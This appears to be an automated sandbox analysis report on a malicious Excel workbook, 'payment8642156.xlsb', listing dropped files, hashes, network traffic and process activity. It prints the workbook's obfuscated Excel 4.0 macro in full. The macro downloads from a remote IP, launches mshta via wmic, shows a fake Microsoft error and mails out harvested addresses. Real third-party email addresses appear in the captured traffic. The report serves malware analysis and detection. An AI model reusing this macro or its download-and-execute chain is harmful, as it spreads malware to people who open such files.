                    SHA-256:64B9D3A5C05342AD3111642F54E45B448EBE6B41651BF19A8A0DA63A6DCBB255
                    SHA-512:E3725419A46E4BADDABDC56FC141CFC61CD72A1FCF93DED2DE74FC0228AD5EE968FE13760FD5D9BCEE4E484EF6FC8F17E981AC422A2D6948F391DBBE58893B35
                    Malicious:false
                    Reputation:low
                    Preview: {"d.billard@climatic-entreprise.com","quickvector@micrografx.com","ballynahinch@freddalzellandpartners.com","dcondella@tulsaoccmedical.com","aziz@bht.ae"}
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG[1].txt
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:ASCII text, with no line terminators
                    Category:downloaded
                    Size (bytes):154
                    Entropy (8bit):4.495777143763227
                    Encrypted:false
                    SSDEEP:3:YBLHMJMKJMPoALGVcH2HJiVRM/GJ9MmLMXkaok1YtA7JQ3KkphABkFGKih2:Y9oMKCPoQ2HJEJ9LLhazaA7J4GkFGKiM
                    MD5:EF774E3B80A3100B0F554661D031479C
                    SHA1:6EB1AFBF3175139C1B5CC9A4020E646F0EE8ECA2
                    SHA-256:64B9D3A5C05342AD3111642F54E45B448EBE6B41651BF19A8A0DA63A6DCBB255
                    SHA-512:E3725419A46E4BADDABDC56FC141CFC61CD72A1FCF93DED2DE74FC0228AD5EE968FE13760FD5D9BCEE4E484EF6FC8F17E981AC422A2D6948F391DBBE58893B35
                    Malicious:false
                    Reputation:low
                    IE Cache URL:http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    Preview: {"d.billard@climatic-entreprise.com","quickvector@micrografx.com","ballynahinch@freddalzellandpartners.com","dcondella@tulsaoccmedical.com","aziz@bht.ae"}
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\32440B49.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 288 x 44, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):2182
                    Entropy (8bit):7.855871655060478
                    Encrypted:false
                    SSDEEP:48:X7LosLnezFsZnj7CkDROl5lcvGv6OmsfWCyzMLBv0i1Is6YCnw5:4sLeyZjrVOzlcvGCOwJzMFQs6A5
                    MD5:55D9AABD2A13AECF656987F081DC5824
                    SHA1:CA82AB022734F7D17EBE185A8C462CC8BD173ACF
                    SHA-256:C4D0B515DFE72D60051C4D7ACFA901AE46D05767F599C65AA035D8C9A89579E0
                    SHA-512:11A9619BB3BD1F7215382391CAFDCE0B2D29F15D51487BA72204D958CF55011D8B095CBD8596C470616D9B60DA4A68DC88AC37E40A90B205061D3A94D229FEBE
                    Malicious:false
                    Reputation:low
                    Preview: .PNG........IHDR... ...,.....JT.....MIDATx...{PT.....>X...\......DY0...#...M...h..`.m&cf.L...L....i.8..#c#6A..!."..m...U|..<...>..!7..6.T.........8....s...D.U. ..!~.. ...%.!.Q....%.!.Q....%.!.Q....%.!.Q....%.!.Q....%.!.Q....%.!.Q....%.!.Q....%.!.Iy.M?.qH...5...=/..NM.a..../U....V..v.n......=..m.....\a...?.0.......j...l..<...A....pb..n. U*.h......K..x...q.6.d.GF....v...o..c<:..z.>h/.h.....5.g..^..]...[..Z.F_b&.{{.a1].Q...i....qU...Y}."{Y..!s3.v..~.............l...%...p.....PT....iBe.... Q(.R..rP.4.X.@.)..*.....c6.SL./..%........../...H....X.......Og...##|..._1ibl.g.NK....T&%N.../?...\..Q....a.Y".D.._...i.>8}.7w..q.......u.P........[..K..tu.A"Q.L..*c6+...../*....9I....d......(U.0k..C.d!!.G.......'W.0.r...F..@.../.|..rr....+....`T..U+|.9....{%...x\....U....1hJ.a..rC..`...s.d*.gf....eb....s.........;.dr.......6...........?E.P....".....U#.U.,.68-.E.R.oSv........,...&m...O.b.....tL&.^.QU.0._}U"..#`2.>|./*.u0..(..}.9..X...D2...%..^.(.1[g.
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C414A8B6.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 237 x 336, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):60538
                    Entropy (8bit):7.970149181563435
                    Encrypted:false
                    SSDEEP:1536:2PFFxgFzx5YVqHS2YzayhpSW4vHR05Q4r5UZKUbD:RFzIsj8aipSW4vHREQ4iZKUbD
                    MD5:ABC5AD9147D307B1DADB93C7AF297C5A
                    SHA1:3658C7DDFA698CDADD1D24C6C8DC4ECF7A09D9E3
                    SHA-256:AEF2CEDE45970E5F0DCC40514D38B0D707A87FBC5943B61763EF20B4A8C0573F
                    SHA-512:D6F7C18AB4E132EAA0620FD83F7EE6C21F2B16ECA70267770C6F8499B18DEE24B3849E9ADDFAA76DA1A4CB13BDB81F1F49DF77CC3BF0146EE68E0CE6860839AA
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: .PNG........IHDR.......P.....Sn.....JiCCPICC Profile..x..W.TS...[RIh..H...R.K..E..*..I ...D....]D@].U.E...ZQ...]......l..I.]=...s........{g...I.....y.|Y|D.kBj.......Z...x|...........7..../.(......'.... q.g...<......|..>Po=#_.. 6...!.*q...(q..W.l..9....L..dY.h7C=....y.o@.*..%..!..x..#!...7M...p...'....C.<^..V..r.X.....?..%/W1...6.H.......F.(%.A.#...X..wb...b.*RD&..QS...k.....x.Q..B......32..\...A....D..EByX...F6->v.g.8l....L.Wi.R.............D.).1j.89.bm...(..fS$.........m ..J"B...LYx..^.'...[$.sc4.*_........7..Y(a'.......s..C..c...$M.X.4?$^3..47Nc.S...J......\<0..H5?.#.KT.gd......A4..P....2.4....=M=.z$....d.!p.h.g..F$...._...|h^.jT.....V.t..........<..r.o.j.d.[2x.5...a...)...&Z.Q..t.-.a.Pb$1.....?.......>..`._..........N...b.7...8..=.kr..:g...z.!x...8.7...h..A.P..D...[....U.5v.W.J.F..8|;S.I.s.EY.+..5c.....o.s.....Q.Zb..}X.v.;.....;.5c..J<....V..xU<9.G..?....r.z.n..|a....8.3e.,Q>....B.W..9........;.~M.b.......]q............8........Z..
                    C:\Users\user\AppData\Local\Temp\5E36.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Excel 2007+
                    Category:dropped
                    Size (bytes):92525
                    Entropy (8bit):7.894464588304831
                    Encrypted:false
                    SSDEEP:1536:Kbhf43n/TFqoN91PFFxgFzx5YVqHS2YzayhpSW4vHR05Q4r5UZKUbgnzWJdk:ufKn7GFzIsj8aipSW4vHREQ4iZKUbgnX
                    MD5:1D434224693AE2ED5D523F63280D7EF8
                    SHA1:518513548B34F2A3E81C2BB8173547838DB80305
                    SHA-256:3CC303E2BEBB9A25530F2536988F88EFF37E65731E8745E86C439A3B0D4A35FF
                    SHA-512:3F7E863AB97DD00D42F826F21BA1A7FDEED87B9BC9DFC0508EED37710292EFB2C009E647D2855DA8CDED2AEFE064161887FE4DD832E9047ACA88574E9A6EAD51
                    Malicious:false
                    Reputation:low
                    Preview: PK..........!.?...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0....?..."......C..=....=3..&...L".}....`.Vr......W.........;6.3.WA.....o.'.`.^K.<tl.....-...!..mr...@..'....vV!9..5.E..A.A\.f...>..m.1.r..V.....]&.....B.1..5JfJT<y....+..7...@.-wR.p....DR.q2~..A|.J~e.4"...d..K..^3'dM.7&..2..C.9.y..E.JFCs+S.).9#z+.....z..GF...?..v.....^C?..p...G..Czx..#.2....;E....^.$.CEF.d:. .u..........(.A=::...9..3..yk...C..=&CS'...i...._...0&..6..|.~$1..s.h..v....<.j...fq..%=...n#.....
                    C:\Users\user\Desktop\~$payment8642156.xlsb
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):165
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                    MD5:797869BB881CFBCDAC2064F92B26E46F
                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                    Static File Info

                    General

                    File type:Microsoft Excel 2007+
                    Entropy (8bit):7.904015574905514
                    TrID:
                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                    • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                    • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                    • ZIP compressed archive (8000/1) 5.73%
                    File name:payment8642156.xlsb
                    File size:92756
                    MD5:c0ba3e41c19da601eb852e9cd468012b
                    SHA1:151cad874dce5400b1cdb1a4f6114c296311f76a
                    SHA256:56e7b2005961a0726ac94e50ed03bfcad15700e3aee1be840ee2b827f7798680
                    SHA512:1f7dbae3767c60853c3c700fac4d14aa93de207cffc540d100502eeb3ac9f78a9a37c3cd4aa63007cbb89f4820943b85d187108101a12f6308c1a4c9490e0962
                    SSDEEP:1536:UW3PFFxgFzx5YVqHS2YzayhpSW4vHR05Q4r5UZKUbtzBTt/4Y3dJnHgdA:VyFzIsj8aipSW4vHREQ4iZKUb9/4Y3jF
                    File Content Preview:PK..........!...l.....W.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                    File Icon

                    Icon Hash:e4e2ea8aa4b4b4b4

                    Static OLE Info

                    General

                    Document Type:OpenXML
                    Number of OLE Files:1

                    OLE File "payment8642156.xlsb"

                    Indicators

                    Has Summary Info:
                    Application Name:
                    Encrypted Document:
                    Contains Word Document Stream:
                    Contains Workbook/Book Stream:
                    Contains PowerPoint Document Stream:
                    Contains Visio Document Stream:
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:

                    Macro 4.0 Code

                    0,564,=FOPEN(CHAR(67) & ":\Pr" & CHAR(111) & "gramData\XgQXeAWeo" & CHAR(79) & "U.rt" & CHAR(102) & "", 3)
                    1,564,=D5673+A4881
                    2,564,=B5015+A1252
                    5,564,=A9794+D9941
                    7,564,=C7294+B4704
                    8,564,=B8908+D6425
                    9,564,=D4166+B8999
                    10,564,=C5227+A9819
                    11,564,=D9330+D5721
                    12,564,=FOR.CELL("JWGrekvAclvvC",Sheet1!AZ170:BV388, TRUE)
                    13,564,=D2725+A4790
                    14,564,=B5224+D865
                    16,564,=B6557+C592
                    18,564,=A4462+C6954
                    24,564,=C7543+C3984
                    25,564,=FWRITE(0,CHAR(JWGrekvAclvvC))
                    26,564,=B6577+D7641
                    27,564,=B9231+A109
                    28,564,=C5152+A6105
                    29,564,=C9330+C4538
                    32,564,=D8363+D5837
                    38,564,=C3484+C4052
                    39,564,=NEXT()
                    41,564,=C1056+A5025
                    45,564,=A9310+A6516
                    48,564,=B6305+D8805
                    50,564,=B1275+A6853
                    53,564,=EXEC(CHAR(119) & CHAR(109) & "ic" & CHAR(32) & CHAR(112) & "ro" & CHAR(99) & "ess call cr" & CHAR(101) & "ate" & CHAR(32) & CHAR(34) & CHAR(109) & CHAR(115) & CHAR(104) & CHAR(116) & "a C:\Pr" & CHAR(111) & "" & CHAR(103) & "ram" & CHAR(68) & "ata" & CHAR(92) & CHAR(88) & "" & CHAR(103) & "" & CHAR(81) & "" & CHAR(88) & "eAWe" & CHAR(111) & CHAR(79) & "U.r" & CHAR(116) & "" & CHAR(102) & "" & CHAR(34))
                    54,564,=A4137+B9753
                    55,564,=A5047+C8222
                    56,564,=C329+B7588
                    57,564,=D8362+B8058
                    60,564,=B8725+A9376
                    61,564,=B5597+D3621
                    63,564,=B6646+A4425
                    64,564,=D8638+A5787
                    65,564,=C1151+D2246
                    68,564,=CALL("" & CHAR(117) & "" & CHAR(114) & "" & CHAR(108) & "mo" & CHAR(110) & "", "URLDownloa" & CHAR(100) & CHAR(84) & CHAR(111) & "FileA","JJ" & CHAR(67) & "CJJ", 0, "http://13" & CHAR(50) & ".148.135.18" & CHAR(51) & CHAR(58) & "80" & CHAR(56) & CHAR(48) & "/Q2W5VWUFL5V" & CHAR(67) & CHAR(77) & "" & CHAR(81) & "7JQPETG3CCTYX72Z4" & CHAR(82) & "25PDG", "C:\Prog" & CHAR(114) & "amData\pXJ" & CHAR(83) & "" & CHAR(78) & "z.txt",0,0)
                    70,564,=C4316+A5336
                    72,564,=C7620+D5946
                    75,564,=A2139+B5075
                    76,564,=D3014+D9522
                    77,564,=D5439+A2132
                    83,564,=ALERT("Err" & CHAR(111) & CHAR(114) & "! " & CHAR(83) & "endi" & CHAR(110) & "g report to Microsoft...")
                    84,564,=A2380+B2698
                    85,564,=B9614+B2053
                    89,564,=A3792+A6744
                    94,564,=B6438+A5552
                    95,564,=FOPEN("C:\ProgramData\pXJ" & CHAR(83) & "" & CHAR(78) & "z.txt",1)
                    96,564,=D8460+A4640
                    98,564,=B5886+A6763
                    99,564,=A2437+B2191
                    102,564,=B5267+B1896
                    103,564,=D2002+D7458
                    105,564,=D2125+A2353
                    106,564,=B7917+C4987
                    108,564,=SEND.MAIL(EVALUATE(FREAD(US96,255)))
                    110,564,=D8532+B9930
                    112,564,=A9148+B1736
                    114,564,=A4485+A1835
                    115,564,=D3104+D8614
                    118,564,=B80+A3728
                    119,564,=C991+A9650
                    120,564,=D7894+A5124
                    121,564,=RETURN()
                    

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Nov 24, 2021 19:08:13.786609888 CET491678080192.168.2.22132.148.135.183
                    Nov 24, 2021 19:08:13.943702936 CET808049167132.148.135.183192.168.2.22
                    Nov 24, 2021 19:08:13.943777084 CET491678080192.168.2.22132.148.135.183
                    Nov 24, 2021 19:08:13.944421053 CET491678080192.168.2.22132.148.135.183
                    Nov 24, 2021 19:08:14.104924917 CET808049167132.148.135.183192.168.2.22
                    Nov 24, 2021 19:08:14.384998083 CET808049167132.148.135.183192.168.2.22
                    Nov 24, 2021 19:08:14.385088921 CET491678080192.168.2.22132.148.135.183
                    Nov 24, 2021 19:09:29.384579897 CET808049167132.148.135.183192.168.2.22
                    Nov 24, 2021 19:09:29.384660006 CET491678080192.168.2.22132.148.135.183

                    HTTP Request Dependency Graph

                    • 132.148.135.183:8080

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.2249167132.148.135.1838080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2021 19:08:13.944421053 CET0OUTGET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: 132.148.135.183:8080
                    Connection: Keep-Alive
                    Nov 24, 2021 19:08:14.384998083 CET1INHTTP/1.1 200 OK
                    Server: nginx/1.0.15
                    Date: Wed, 24 Nov 2021 18:08:14 GMT
                    Content-Type: text/plain; charset=utf-8
                    Connection: keep-alive
                    Content-Length: 154
                    Data Raw: 7b 22 64 2e 62 69 6c 6c 61 72 64 40 63 6c 69 6d 61 74 69 63 2d 65 6e 74 72 65 70 72 69 73 65 2e 63 6f 6d 22 2c 22 71 75 69 63 6b 76 65 63 74 6f 72 40 6d 69 63 72 6f 67 72 61 66 78 2e 63 6f 6d 22 2c 22 62 61 6c 6c 79 6e 61 68 69 6e 63 68 40 66 72 65 64 64 61 6c 7a 65 6c 6c 61 6e 64 70 61 72 74 6e 65 72 73 2e 63 6f 6d 22 2c 22 64 63 6f 6e 64 65 6c 6c 61 40 74 75 6c 73 61 6f 63 63 6d 65 64 69 63 61 6c 2e 63 6f 6d 22 2c 22 61 7a 69 7a 40 62 68 74 2e 61 65 22 7d
                    Data Ascii: {"d.billard@climatic-entreprise.com","quickvector@micrografx.com","ballynahinch@freddalzellandpartners.com","dcondella@tulsaoccmedical.com","aziz@bht.ae"}


                    Code Manipulations

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Start time:19:07:24
                    Start date:24/11/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Imagebase:0x13f170000
                    File size:28253536 bytes
                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:19:07:46
                    Start date:24/11/2021
                    Path:C:\Windows\System32\wbem\WMIC.exe
                    Wow64 process (32bit):false
                    Commandline:wmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf"
                    Imagebase:0xff1c0000
                    File size:566272 bytes
                    MD5 hash:FD902835DEAEF4091799287736F3A028
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    General

                    Start time:19:07:47
                    Start date:24/11/2021
                    Path:C:\Windows\System32\mshta.exe
                    Wow64 process (32bit):false
                    Commandline:mshta C:\ProgramData\XgQXeAWeoOU.rtf
                    Imagebase:0x13f230000
                    File size:13824 bytes
                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis

                    Reset < >